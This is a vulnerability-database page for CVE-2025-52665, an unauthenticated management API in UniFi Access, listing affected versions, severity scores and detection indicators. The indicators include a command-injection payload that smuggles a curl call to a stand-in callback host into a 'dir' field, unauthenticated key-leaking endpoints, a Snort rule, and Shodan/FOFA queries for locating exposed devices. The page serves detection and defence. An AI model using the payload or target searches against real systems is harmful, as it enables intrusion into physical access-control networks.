cbcvebase.
CVE-2025-52665
published 2025-10-31

CVE-2025-52665: A malicious actor with access to the management network could exploit a misconfiguration in UniFi’s door access application, UniFi Access, that exposed a…

PriorityP192critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
40.97%
98.5th percentile
A malicious actor with access to the management network could exploit a misconfiguration in UniFi’s door access application, UniFi Access, that exposed a management API without proper authentication. This vulnerability was introduced in Version 3.3.22 and was fixed in Version 4.0.21 and later. Affected Products: UniFi Access Application (Version 3.3.22 through 3.4.31). Mitigation: Update your UniFi Access Application to Version 4.0.21 or later.

Affected

2 ranges
VendorProductVersion rangeFixed in
ubiquiti_incunifi_access_application3.3.22 – 3.4.31
uiunifi_access>= 3.3.22 < 4.0.214.0.21

Detection & IOCsextracted from sources · hover to see the quote

url/api/v1/user_assets/touch_pass/keys
url/api/ucore/backup/export
url/api/v1/user_assets/nfc
port9780
command{"dir":"/tmp/<rand>-; curl http://<interactsh-url>/; #"}
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS UniFi Access Unauthenticated Remote Code Execution (CVE-2025-52665)"; flow:established,to_server; http.uri; content:"/api/ucore/backup/export"; fast_pattern; http.request_body; content:"|22|dir|22 3a|"; pcre:"/^\s*?\x22[^\x22]*?[\x3b\x26\x60\x7c\x24]/R"; reference:url,www.catchify.sa/post/cve-2025-52665-rce-in-unifi-os-25-000; reference:cve,2025-52665; classtype:web-application-attack; sid:2065968; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2025_12_01, cve CVE_2025_52665, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_12_01, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Detect unauthenticated GET requests to /api/v1/user_assets/touch_pass/keys on port 9780; a successful response will contain JSON fields 'google_pass_auth_key' and/or 'apple_nfc' with HTTP 200 and Content-Type application/json.
  • Detect unauthenticated POST to /api/ucore/backup/export on port 9780 with a 'dir' JSON field containing shell metacharacters (;, &, `, |, $) — indicative of command injection exploitation.
  • Detect unauthenticated POST to /api/v1/user_assets/nfc on port 9780; a successful exploitation response returns JSON body containing 'CODE_SUCCESS' with HTTP 200.
  • Use Shodan/FOFA to identify exposed UniFi targets: Shodan query 'html:"UniFi Dream Machine SE"' or 'http.html:"UniFi OS"'; FOFA query 'body="UniFi OS"'.
  • Confirm target is a vulnerable UniFi device by checking the /login page for the strings 'UniFi OS' or 'UniFi Dream Machine SE' before attempting exploitation steps.
  • ·The vulnerability was introduced in version 3.3.22 and only affects UniFi Access Application versions 3.3.22 through 3.4.31; versions prior to 3.3.22 and 4.0.21+ are not affected.
  • ·The Nuclei template for the RCE vector (CVE-2025-52665) is marked 'verified: false', meaning the RCE chain via /api/ucore/backup/export has not been independently confirmed by the template author.
  • ·The Snort/ET rule requires TLS decryption to be effective, as indicated by the metadata deployment tag 'SSLDecrypt' and 'tls_state TLSDecrypt'.

CVSS provenance

nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.